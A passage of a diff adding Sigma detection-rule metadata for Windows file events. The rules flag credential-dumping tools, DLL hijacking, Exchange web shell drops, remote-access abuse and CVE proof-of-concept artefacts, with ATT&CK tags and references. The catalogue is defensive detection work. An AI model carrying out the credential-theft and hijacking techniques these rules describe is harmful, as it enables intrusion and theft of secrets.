"1a3d42dd-3763-46b9-8025-b5f17f340dfb", + "value": "Suspicious Unattend.xml File Access" + }, + { + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "meta": { + "author": "@ROxPinTeddy", + "creation_date": "2020/05/12", + "falsepositive": [ + "Legitimate administrative use" + ], + "filename": "file_event_win_advanced_ip_scanner.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ] + }, + "uuid": "fed85bf9-e075-4280-9159-fbe8a023d6fa", + "value": "Advanced IP Scanner - File Event" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/11", + "falsepositive": [ + "Legitimate use" + ], + "filename": "file_event_win_anydesk_artefact.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "0b9ad457-2554-44c1-82c2-d56a99c42377", + "value": "Anydesk Temporary Artefact" + }, + { + "description": "Detects anydesk writing binaries files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it's highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that's part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/28", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_anydesk_writing_susp_binaries.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "2d367498-5112-4ae5-a06a-96e7bc33a211", + "value": "Suspicious Binary Writes Via AnyDesk" + }, + { + "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.", + "meta": { + "author": "@41thexplorer, Microsoft Defender ATP", + "creation_date": "2018/11/20", + "falsepositive": "No established falsepositives", + "filename": "file_event_win_apt_unidentified_nov_18.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/DrunkBinary/status/1063075530180886529", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_apt_unidentified_nov_18.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218.011" + ] + }, + "uuid": "3a3f81ca-652c-482b-adeb-b1c804727f74", + "value": "Unidentified Attacker November 2018 - File" + }, + { + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "meta": { + "author": "C.J. May", + "creation_date": "2022/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_bloodhound_collection.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_bloodhound_collection.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "02773bed-83bf-469f-b7ff-e676e7d78bab", + "value": "BloodHound Collection Files" + }, + { + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/12", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_crackmapexec_patterns.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_crackmapexec_patterns.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "value": "CrackMapExec File Creation Patterns" + }, + { + "description": "Detects the creation of system dlls that are not present on the system. Usualy to achieve dll hijacking", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/01", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_create_non_existent_dlls.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ] + }, + "uuid": "df6ecb8b-7822-4f4b-b412-08f524b4576c", + "value": "Creation Of Non-Existent DLLs In System Folders" + }, + { + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_creation_new_shim_database.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ] + }, + "uuid": "ee63c85c-6d51-4d12-ad09-04e25877a947", + "value": "New Shim Database Created in the Default Directory" + }, + { + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_creation_scr_binary_file.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_scr_binary_file.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.002" + ] + }, + "uuid": "97aa2e88-555c-450d-85a6-229bcd87efb8", + "value": "Suspicious Screensaver Binary File Creation" + }, + { + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "meta": { + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "creation_date": "2020/05/26", + "falsepositive": [ + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" + ], + "filename": "file_event_win_creation_system_file.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_system_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "value": "Files With System Process Name In Unsuspected Locations" + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_creation_unquoted_service_path.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_unquoted_service_path.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.009" + ] + }, + "uuid": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "value": "Creation Exe for Service with Unquoted Path" + }, + { + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/11/01", + "falsepositive": [ + "Legitimate Administrator using tool for password recovery" + ], + "filename": "file_event_win_cred_dump_tools_dropped_files.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" + ] + }, + "uuid": "8fbf3271-1ef6-4e94-8210-03c2317947f6", + "value": "Cred Dump Tools Dropped Files" + }, + { + "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", + "meta": { + "author": "Tim Shelton", + "creation_date": "2022/01/10", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_cscript_wscript_dropper.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml" + ], + "tags": "No established tags" + }, + "uuid": "002bdb95-0cf1-46a6-9e08-d38c128a6127", + "value": "WScript or CScript Dropper - File" + }, + { + "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_csharp_compile_artefact.yml", + "level": "low", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.004" + ] + }, + "uuid": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", + "value": "Dynamic C Sharp Compile Artefact" + }, + { + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_cve_2021_1675_printspooler.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/afwu/PrintNightmare", + "https://github.com/cube0x0/CVE-2021-1675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" + ] + }, + "uuid": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", + "value": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern" + }, + { + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/03/03", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_cve_2021_26858_msexchange.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_26858_msexchange.yml" + ], + "tags": [ + "attack.t1203", + "attack.execution", + "cve.2021.26858" + ] + }, + "uuid": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", + "value": "CVE-2021-26858 Exchange Exploitation" + }, + { + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/07/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" + ] + }, + "uuid": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", + "value": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum" + }, + { + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/22", + "falsepositive": [ + "Unknown", + "Possibly some Microsoft Edge upgrades" + ], + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/klinix5/InstallerFileTakeOver", + "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "value": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event" + }, + { + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", + "https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_44077_poc_default_files.yml" + ], + "tags": [ + "attack.execution", + "cve.2021.44077" + ] + }, + "uuid": "7b501acf-fa98-4272-aa39-194f82edc8a3", + "value": "CVE-2021-44077 POC Default Dropped File" + }, + { + "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/13", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_cve_2022_24527_lpe.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2022_24527_lpe.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1059.001", + "cve.2022.24527" + ] + }, + "uuid": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "value": "CVE-2022-24527 Microsoft Connected Cache LPE" + }, + { + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "meta": { + "author": "Subhash Popuri (@pbssubhash)", + "creation_date": "2021/08/21", + "falsepositive": [ + "Any powershell script that creates bat files" + ], + "filename": "file_event_win_detect_powerup_dllhijacking.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_detect_powerup_dllhijacking.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.001" + ] + }, + "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "value": "Powerup Write Hijack DLL" + }, + { + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_dll_sideloading_space_path.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1552932770464292864", + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "b6f91281-20aa-446a-b986-38a92813a18f", + "value": "DLL Search Order Hijackig Via Additional Space in Path" + }, + { + "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_error_handler_cmd_persistence.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/", + "https://github.com/last-byte/PersistenceSniper", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_error_handler_cmd_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "15904280-565c-4b73-9303-3291f964e7f9", + "value": "Persistence Via ErrorHandler.Cmd" + }, + { + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "meta": { + "author": "Florian Roth (rule), MSTI (query, idea)", + "creation_date": "2022/10/01", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_exchange_webshell_drop.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", + "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "bd1212e5-78da-431e-95fa-c58e3237a8e6", + "value": "Suspicious ASPX File Drop by Exchange" + }, + { + "description": "Detects suspicious file type dropped by an Exchange component in IIS", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/04", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_exchange_webshell_drop_suspicious.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", + "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1190", + "attack.initial_access", + "attack.t1505.003" + ] + }, + "uuid": "6b269392-9eba-40b5-acb6-55c882b20ba6", + "value": "Suspicious File Drop by Exchange" + }, + { + "description": "Detects default lsass dump filename from SafetyKatz", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/07/24", + "falsepositive": [ + "Rare legitimate files with similar filename structure" + ], + "filename": "file_event_win_ghostpack_safetykatz.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/SafetyKatz", + "https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ghostpack_safetykatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "e074832a-eada-4fd7-94a1-10642b130e16", + "value": "SafetyKatz Default Dump Filename" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate use" + ], + "filename": "file_event_win_gotoopener_artefact.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "5d756aee-ad3e-4306-ad95-cb1abec48de2", + "value": "GoToAssist Temporary Installation Artefact" + }, + { + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/02/04", + "falsepositive": [ + "Very unlikely" + ], + "filename": "file_event_win_hack_dumpert.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/outflanknl/Dumpert", + "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hack_dumpert.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "value": "Dumpert Process Dumper Default File" + }, + { + "description": "Detects files written by the different tools that exploit HiveNightmare", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/23", + "falsepositive": [ + "Files that accidentally contain these strings" + ], + "filename": "file_event_win_hivenightmare_file_exports.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/GossiTheDog/HiveNightmare", + "https://github.com/FireFart/hivenightmare/", + "https://github.com/WiredPulse/Invoke-HiveNightmare", + "https://twitter.com/cube0x0/status/1418920190759378944", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" + ] + }, + "uuid": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", + "value": "Typical HiveNightmare SAM File Export" + }, + { + "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_hktl_nppspy.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy", + "https://twitter.com/0gtweet/status/1465282548494487554", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "cad1fe90-2406-44dc-bd03-59d0b58fe722", + "value": "NPPSpy Hacktool Usage" + }, + { + "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/21", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc", + "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml" + ], + "tags": [ + "attack.t1566", + "attack.t1566.001", + "attack.initial_access", + "attack.t1574", + "attack.t1574.001", + "attack.defense_evasion" + ] + }, + "uuid": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", + "value": "Potential Initial Access via DLL Search Order Hijacking" + }, + { + "description": "TeamViewer_Desktop.exe is create during install", + "meta": { + "author": "frack113", + "creation_date": "2022/01/28", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_install_teamviewer_desktop.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", + "value": "Installation of TeamViewer Desktop" + }, + { + "description": "Detects the presence and execution of Inveigh via dropped artefacts", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_inveigh_artefacts.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs", + "https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_inveigh_artefacts.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "value": "Inveigh Execution Artefacts" + }, + { + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped 